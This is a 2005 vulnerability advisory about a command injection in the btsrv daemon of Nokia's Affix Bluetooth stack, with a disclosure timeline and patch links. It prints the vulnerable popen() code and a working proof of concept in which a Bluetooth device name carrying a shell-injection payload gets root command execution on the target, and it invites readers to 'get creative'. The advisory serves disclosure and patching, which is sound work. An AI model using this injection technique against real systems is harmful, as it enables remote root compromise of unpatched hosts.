DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'
Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References:
http://www.digitalmunition.com/DMA[2005-0826a].txt
Description:
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia
Research Center in
Helsinki and released under GPL. Affix supports the core Bluetooth protocols
like HCI, L2CAP 1.1,
L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of
'affix-kernel' which
provides kernel modules and 'affix' which provides control tools, libraries,
and server daemons.
Although Nokia believes that Affix is an useful piece of software, please bear
in mind that it is
not an official Nokia product, but a result of the research activity of Nokia
Research Center.
The following code snippet was found in affix-3.2.0/daemon/btsrv.c:
int event_pin_code_request(struct PIN_Code_Request_Event *evt, int devnum)
{
...
err = HCI_RemoteNameRequest(fd, &dev, name);
if (err) {
BTDEBUG("Name request failed: %s", hci_error(err));
...
sprintf(cmdline, "/etc/affix/btsrv-gui pin \"%s\" %s", name,
bda2str(&evt->bda));
DBPRT("cmdline: [%s]", cmdline);
fp = popen(cmdline, "r");
if (!fp) {
BTERROR("popen() failed");
goto err;
}
err = fscanf(fp, "%s", pin);
if (err == EOF) {
BTERROR("fscanf() failed");
pclose(fp);
goto err;
}
Exploitation of this bug is easier than the bluez variation of the same attack.
When exploiting
bluez, previous population of the bluetooth name cache is required. On Affix
however the call to
HCI_RemoteNameRequest() makes this an instant exploit regardless of the name
cache.
The btsrv daemon should obviously be started.
root@animosity:~# btsrv
btsrv: main: btsrv started [Affix 3.2.0].
btsdpd: main: btsdpd Affix 3.2.0 started.
btsrv: start_service: Bound service Dialup Networking to port 1
btsrv: start_service: Bound service Dialup Networking Emulation to port 2
btsrv: start_service: Bound service Fax Service to port 3
btsrv: start_service: Bound service LAN Access to port 4
btsrv: start_service: Bound service OBEX File Transfer to port 5
btsrv: start_service: Bound service OBEX Object Push to port 6
As an example I will use my Ipaq 2215 to attack an Affix box. First I set the
bluetooth name of
my device to ";/usr/bin/id>/tmp/ooooo;"
Next I start the attack by opening the bluetooth manager, clicking tools and
going to Paired
devices. Next I click Add, search for the target host and then double tap it.
When prompted for
a pin code I type in any random pin code and press enter.
After a few moments I get an "Authentication failed!" message.
On the screen where btsrv was started I see the following error which indicates
an attack is
in progress.
Traceback (most recent call last):
File "/etc/affix/btsrv-gui", line 106, in ?
pin = t.go("Connection from %s [%s]" % (sys.argv[2], sys.argv[3]))
IndexError: list index out of range
sh: : command not found
btsrv: event_pin_code_request: fscanf() failed
Looking in /tmp on the target device shows successful exploitation.
root@animosity:~# ls -al /tmp/ooooo
-rw-r--r-- 1 root root 134 2005-08-26 16:47 /tmp/ooooo
root@animosity:~# cat /tmp/ooooo
uid=0(root) gid=0(root) groups=0(root)
Feel free to get creatitve with this...
http://www.digitalmunition.com/BluezHCIDpwned.txt
Official patches for Affix can be found at http://affix.sourceforge.net
http://affix.sourceforge.net/patch_btsrv_affix_3_2_0
http://affix.sourceforge.net/patch_btsrv_affix_2_1_2
Timeline:
08/06/2005 bluez 2.19 stomps my Affix bug and reveals that *someone* borrowed
bad code again!
08/18/2005 *sigh* I guess I should tell Nokia about the bug now.
08/22/2005 Carlos.Chinea from nokia responds that he will "look to it asap and
fix it also asap".
08/26/2005 btsrv popen() call patch released
Outtakes:
"no, they copied from us.." - bluez
"As far as I know, we didn't borrow code...So I guess they did then" - affix
-KF
